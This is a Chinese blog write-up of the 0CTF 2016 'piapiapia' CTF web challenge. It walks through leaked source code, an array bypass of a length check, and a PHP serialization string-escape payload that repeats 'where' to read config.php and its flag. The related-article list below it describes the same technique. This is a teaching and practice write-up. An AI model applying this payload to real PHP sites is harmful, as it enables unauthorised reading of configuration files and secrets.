[0CTF 2016]piapiapia 1--序列化问题

最新推荐文章于 2024-06-20 22:09:50 发布
最新推荐文章于 2024-06-20 22:09:50 发布
阅读量351 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cainiao17441898/article/details/117732050
版权

前言:这里存在源文件泄露。用dirsearch扫一下就有了要记的加参数-e* -s 1
这里不作赘述。
发现有6个PHP文件的泄露。
解题:
发现在config.php文件里面有个fla参数。那基本方向就名确了。下面就是应该怎么打开这个文件呢。
在这里插入图片描述
在profile.php文件中发现了,有个file_get_config函数,这个函数可以打开文件。那也就是说:$profile[‘photo’]=config.php就好了。

$profile = unserialize($profile);
		$phone = $profile['phone'];
		$email = $profile['email'];
		$nickname = $profile['nickname'];
		$photo = base64_encode(file_get_contents($profile['photo']));

在updata.php中发现了下面这个代码,也就是说我们要是直接用bp抓包在photo中传入config.php文件肯定是行不通的因为有upload和md5加密文件名挡住了。那么也就只能想办法看能不能把传入的照片被序列后的代码丢弃掉了。

move_uploaded_file($file['tmp_name'], 'upload/' . md5($file['name']));
		$profile['phone'] = $_POST['phone'];
		$profile['email'] = $_POST['email'];
		$profile['nickname'] = $_POST['nickname'];
		$profile['photo'] = 'upload/' . md5($file['name']);
		
		$user->update_profile($username, serialize($profile));

在class.php文件里面有一个过滤函数,当在前端我们写入的数据要被传入数据库里面之前会被过滤一下。在黑名单中的字符串会被替换成hacker。

public function filter($string) {
		$escape = array('\'', '\\\\');
		$escape = '/' . implode('|', $escape) . '/';
		$string = preg_replace($escape, '_', $string);

		$safe = array('select', 'insert', 'update', 'delete', 'where');
		$safe = '/' . implode('|', $safe) . '/i';
		return preg_replace($safe, 'hacker', $string);
	}

也就是这个:";}s:5:“photo”;s:10:“config.php”;}是我们要传入的被序列化后的字符串。}为啥要用这个符号呢,因为他还有一段if判断:如图

if(preg_match('/[^a-zA-Z0-9_]/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
			die('Invalid nickname');

pre_match和strlen这俩函数如果我们传入的是个数组他就会返回false就可绕过了。那么数组被序列化之后是这样的:a:1:{i:0;a:4:{i:0;s:2:“hp”;i:1;s:3:“Len”;i:2;s:4:“hack”;i:3;s:3:“bad”;}}所以";}这个符号是为了闭合被序列化后的数组。

<?php
$x[]=array("hp","Len","hack","bad");
echo serialize($x);
?>

";}s:5:“photo”;s:10:“config.php”;}这个字符串长度是34,意思书我们传入数据例如:

<?php
$profile1['phone'] ='12345678907';
$profile1['email'] = '12341567974@qq.com';
$profile1['nickname'] =array('hack";}s:5:"photo";s:10:"config.php";}');
$profile1['photo'] = 'config.php';
echo strlen('";}s:5:"photo";s:10:"config.php";}')."<br>";
echo "<br>".serialize($profile1);
?>

在这里插入图片描述要是能把上图中蓝色框框中的代码逃逸出来就好了。我们就能想到在黑名单过滤中那几个字符串会被换成hacker这个字符串,并且是先序列化再进行的过滤,也就是说要是我们能让它过滤之后不包括";}s:5:“photo”;s:10:“config.php”;}长度变长34这不就能把它逃逸出来了吗,然后发现每传入一个where就会变成hacker,长度就+1。这不就起飞了?那我们传入34个where就好了。自己一个个打太慢了。

<?php
$hack='where';
for ($i=0;$i<34;$i++){
    $hacker.=$hack;
}
echo $hacker;
?>

这就解出来了,因为我们传入函数是在updata.php文件中的,所以随便注册一个账号,update.php传参的时候抓包一下传入我们的数据就好了。如图:
在这里插入图片描述因为下面这个代码他是被base64编码了的。所以我们跳转到profile.php中去查看。

$photo = base64_encode(file_get_contents($profile['photo']))

在这里插入图片描述解码一下:就得到flag了。
在这里插入图片描述总结:这题还是比较有意思的,主要考察了代码审计、序列化和一些常见的函数漏洞。解题之前先把逻辑理清楚就会好很多了。

熊是本熊
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
[0CTF-2016] piapiapia
Logerrik的博客
05-11 439
[0CTF-2016] piapiapia PHP反序列化字符逃逸 1.www.zip源码泄露 试了下发现不太像sql注入,扫下目录发现www.zip泄露 最近好多题都是这种源码泄露,建议字典齐全一点,不然扫不出来真的难受 2.源码 源码还挺多 config.php里面看到有flag,最后目标应该就是读取到config里面的flag就可以了 $config[‘hostname’] = ‘127.0.0.1’; $config[‘username’] = ‘root’; $config[‘password’
[0CTF 2016] piapiapia 题解
lonmar的博客
01-27 732
序列化字符逃逸
[0CTF 2016]piapiapia 1
shinygod的博客
03-25 2337
知识点:字符串绕过长度限制 反序列字符串化逃逸 知识点 字符串绕过长度限制 例如: strlen($_POST['nickname']) > 10 我们可以传一个nickname[]来绕过。 反序列字符串化逃逸 这边的内容,可以看这篇文章: https://blog.csdn.net/shinygod/article/details/123284185 里面通过一个专门的题目详细讲解了反序列字符串化逃逸的两种情况。 解题思路 可以用dirsearch来扫,当然如果运气好的话说不定会直接找到
[0CTF 2016]piapiapia1
最新发布
alwtj的博客
06-20 773
于是我又盯上了photo前面的nickname, 由于我们传入的参数是经过序列化之后的,所以我们可以通过序列化的键值对逃逸来完成它.那么,此时我们的数组长度为39除了 where 多了34 位,我们要想办法把那 34 位去掉,这个时候就用到了filter.所以我们的思路就是通过file_get_contents()这个函数获取,config.php里的内容~那么我们就明白了,我们需要使查询的内容中对用的 photo 的内容为config.php.既然知道了要查询到的内容,那么就找地方该插入数据了.
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
12-20
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: ... <?... if($_SESSION['username']) { ... if($_POST['username'] && $_POST['password']) { ... if(strlen($username
---已搬运--:[0CTF 2016]piapiapia -----代码审计+字符串逃逸+数组绕过长度限制+以及一下小知识点 preg_match()用数组,而且注意if是正确判断,还是错误判断
Zero_Adam的博客
02-22 625
目录:一、知识点:1.url传入数组绕过长度限制??2.数组的遍历3.数组绕过正则二、我自己的做题尝试:三、不足:四、学习WP1.学习一个大佬的思路:2.学习 另一个大佬的思路 ---这个过于跳跃,看上一个把,,五、思路学完了,自己做做看看。 一、知识点: 1.url传入数组绕过长度限制?? 就是判断你输入字符串不能够太长的时候, 用数组可以进行绕过; 2.数组的遍历 两种遍历方法 foreach(array_expression as $value) foreach(array_expressio
BUUCTF--[0CTF 2016]piapiapia
qq_43054896的博客
05-01 1140
一、[0CTF 2016]piapiapia 1、dirsearch扫出了了www.zip压缩包 2、审计代码,在config.php中有变量flag,但为空,flag应该在服务器的config.php文件中,要找漏洞读取服务器的flag 3、审计代码,有注册功能,且代码中要求必须注册才能进行其后的操作;update.php中对用户填写的信息进行了一些限制,且将信息序列化保存,除此之外clas...
0CTF-2016-piapiapia(php反序列化长度变化尾部字符串逃逸)
Sea_Sand息禅
07-21 6523
一个很可爱的登录界面: 进行一下目录扫描,发现源码泄露www.zip,把源码给出: index.php <?php require_once('class.php'); if($_SESSION['username']) { header('Location: profile.php'); exit; } if($_POST['username'] && $...
BUUCTF-WEB 【0CTF 2016piapiapia 1
qq_36410265的博客
12-27 1920
BUUCTF-WEB 【0CTF 2016piapiapia 1
[0CTF 2016]piapiapia
沐目的博客
10-23 5633
0x00.感悟      写完这道题,我感觉到了扫源码的重要性。暑假复现的那些CVE,有的就是任意文件读取,有的是任意命令执行,这些应该都是通过代码审计,得到的漏洞。也就和我们的CTF差不多了。      但是我们扫目录,字典是个大问题,我目前还没有搞懂为什么有些文件,只能被一些特定的软件扫到。比如这道题,这个dirsearch,连www.zip这样的变态目录都能扫出来,为什么扫不出update....
审计练习5——[0CTF 2016]piapiapia
qq_43756333的博客
05-29 2116
平台:buuctf.cn 打开靶机源码如下: <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET['host']; $host = esc
[0CTF 2016]piapiapia(字符逃逸详解)
记录学习,一起进步
02-01 887
[0CTF 2016]piapiapia
[0CTF 2016]piapiapia WP(详细)
qq_43622442的博客
04-25 4295
[0CTF 2016]piapiapia WP(详细) 1.打开网站,是个登录框,尝试注入无果.....按道理来说就是注入了啊喂 2.玄学时间到:::       目录扫完啥结果没有。在buuctf做题总是这样,御剑线程开1,不管有没有压缩文件,统统扫不到- -但是可以扫出来普通的php文件,dirsearch要加延迟和调线程,不然...
[0CTF 2016]piapiapia(反序列化逃逸)
羽的博客
03-01 3156
通过扫描后台目录获得了源码(www.zip)。解压出来发现出了登录之外还有注册和其他的目录。在config.php中发现了flag变量,看来题目目的是让我们读取config.php了。 我们来看下每个页面: 1 index.php,register.php: 这两个个是登录页面和注册页面,要求我们输入的用户名和密码的长度都在3-16内。 2 class.php: 在class.php中我们发现了过...
[0CTF 2016]piapiapia 详细解题思路及做法
EC_Carrot的博客
12-09 1303
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 进去是一个登陆界面,尝试sql注入,发现没什么用,但又没有其他功能了,只能扫描看看有没有源码泄露 这边用的是dirsearch,可以扫描出www.zip文件,但在BUUCTF里面做题需要设置延迟参数-x,不然扫描太快就全是返回429状态码。 在www.zip提供的源码里面主要有: index.php、profile.php、register.p
PHP反序列化漏洞分析:0CTF-2016-piapiapia挑战解析
"php反序列化长度变化尾部字符串逃逸技术在0CTF-2016-piapiapia挑战中的应用" 在信息安全竞赛中,0CTF-2016-piapiapia是一个涉及PHP反序列化漏洞的挑战。这个题目主要探讨了如何利用PHP的反序列化机制,通过长度...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

熊是本熊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值